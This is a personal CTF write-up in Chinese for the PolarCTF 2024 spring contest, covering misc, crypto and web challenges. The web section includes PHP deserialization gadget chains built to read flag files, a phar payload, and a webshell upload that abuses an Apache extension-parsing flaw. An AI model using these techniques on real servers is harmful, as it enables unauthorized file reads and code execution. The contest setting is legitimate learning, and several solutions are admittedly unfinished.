楚颖i polarctf2024春季个人挑战赛WriteUp

216fe58619c3bf75ba3c681baf9383e

PolarCTF网络安全2024春季个人挑战赛

WRITE UP

参赛人员：

楚颖i

PolarCTF网络安全个人挑战赛组委会制

3-3 PHP_Deserialization 15

第一部分：MISC

1-4 加点什么1.0

本题思路如下：

图片尾藏压缩包，提取解压后是一个ks.cpp，简单看了一下，结合名字：凯撒解密

解密函数中加了这一句

Flag：flag{372658619FE0707E8C64DB2400B96991}

1-5 你懂不懂二维码

本题思路如下：

文件损坏，改zip头

Polar，jpg尾有压缩包密码666777888

解压里面的txt文件，得到二维码，扫描即得flag

Flag：flag{zun_du_jia_du}

第二部分：CRYPTO

2-1 离家出走的猫猫

本题思路如下：

四个交了全错，没思路了

2-2 歌词最后一句

本题思路如下：

图片专辑：周杰伦十一月的萧邦

Flag：flag{776e26e39d01c914e8faa6796bf7e9b3}

2-3 周杰伦的贝斯

本题思路如下：

👊👢👧👉👎🐽👅👁👈🐧👉👆👈👣👟👐👊👱🐧🐰👇👈🐴🐴

Base100：SkpRWFNJQ0ROQlhYSz09PQ==

Base64：JJQXSICDNBXXK===

Base32：Jay Chou

Flag：flag{Jay Chou}

2-5 阴阳怪气的杰斐逊

本题思路如下：

一个word文件，一个zhuanlun.txt

阴阳怪气解密

云影密码解密

WLDOFEQWARAVWA

Word里给了秘钥2,5,1,3,6,4,9,7,8,14,10,13,11,12

好像每届都有转轮

直接拿mu爷脚本

text=""
code = [
"ZWJXAGDLUBVIQHKYPNTCRMOSFE",
"KPBELNACZDTRXMJQOYHGVSFUWI",
"BDMAIZVRNSJUWFHTEQPYXGLOCK",
"RPLNDVHGFCUSTEBKXQYIZMJWAO",
"FHIRLABEUOTSGJVDKCPMNZQWXY",
"AMKGHJWPNYCIBFZDRUSLOQXVET",
"GWTHSPYBXIZULVKMRAFDCEONJQ",
"NOZUTWDCVRJLXKISEFAPMYGHBQ",
"QWATDSRFHENYVUBMCOIKZGJXPL",
"WABMCXPLTDSRJQZGOIKFHENYVU",
"XPLTDAOIKFZGHENYSRUBMCQWVJ",
"TDSWAYXPLVUBOIKZGJRFHENMCQ",
"BMCSRFHLTDENQWAOXPYVUIKZGJ",
"XPHKZGJTDSENYVUBMLAOIRFCQW"
]
print(code)
codetext="WLDOFEQWARAVWA"
codenum = "2,5,1,3,6,4,9,7,8,14,10,13,11,12"
codenum=codenum.split(",")#把这些数字都弄到一个里面去
#print(codenum)
a=0
print("解密后的：")
for i in codenum:
index=code[int(i)-1].index(codetext[a])
a=a+1
code[int(i)-1]=code[int(i)-1][index:]+code[int(i)-1][:index]
print(code[int(i)-1])

#完成了变形了

print("下面是每一列的")
for i in range(len(code[0])):
str=""
print("第{}列的是:".format(i),end="")
for j in codenum:
str+=code[int(j)-1][i]
print(str.lower())

第24列的是:fiagispqeoupcs

然后就是死活交不上去。。。。。。。。。不知道哪有问题了（i？）

2-6 rsaaa

本题思路如下：

毫无难度的rsa

from Crypto.Util.number import *

e = 65537

p = 9648423029010515676590551740010426534945737639235739800643989352039852507298491399561035009163427050370107570733633350911691280297777160200625281665378483

q = 11874843837980297032092405848653656852760910154543380907650040190704283358909208578251063047732443992230647903887510065547947313543299303261986053486569407

c = 75036747635306642448951304206998877676661823155273906467327033126738852180428655042280881978878498990667216678397370196258985509664476355705024803037163192947063192452198182809379575421727717664980771937882048579654137560876937198021458204902826397562775388222716165902130775042367930795903054668968295345506

n = p * q

phi = (p-1) * (q-1)

d = inverse(e, phi)

m = pow(c, d, n)

print(long_to_bytes(m))

# b' welcome to polar'

Flag：flag{welcome to polar}

第三部分：WEB

3-3 PHP_Deserialization

本题思路如下：

Polar->night->day

$a = new Polar();
$a->night = new Night();
$a->night_arg = new Day();
$a->night_arg->filename='/flflagag';
echo base64_encode(serialize($a));

Ctrl u 拿flag

Flag：flag{8630a77f22f9366959a385f9ed794122}

3-5 PlayGame

本题思路如下：

Playgame->User->playgame

$a = new PlayGame();
$a->user = new User();
$a->user->name = new PlayGame();
$a->user->name->gameFile='/flag';
echo serialize($a);

传参问题：polar[flag.flag会被解析成polar_flag.flag

Flag：flag{bcbad1a16895974105e8450b8a7b5bf2}

3-6 file

本题思路如下：

Dirsearch

上传发现，只能上传图片，没有文件包含路径

发现服务器为apache2.4.23

https://blog.csdn.net/qq_32277727/article/details/136141702

尝试解析漏洞

上传1.php.jpg

访问路径发现没解析成图片，蚁剑连接

3-7 phar

本题思路如下：

古剑山题

$re = new A();
$re->a = new B();
$re->a->b['kfc'] = new C();
$re->a->b['kfc']->c['vm50']='flag';
echo serialize($re);
//O:1:"A":1:{s:4:"%00A%00a";O:1:"B":1:{s:4:"%00B%00b";a:1:{s:3:"kfc";O:1:"C":1:{s:4:"%00C%00c";a:1:{s:4:"vm50";s:4:"flag";}}}}}

应该没问题，但没打通，难受了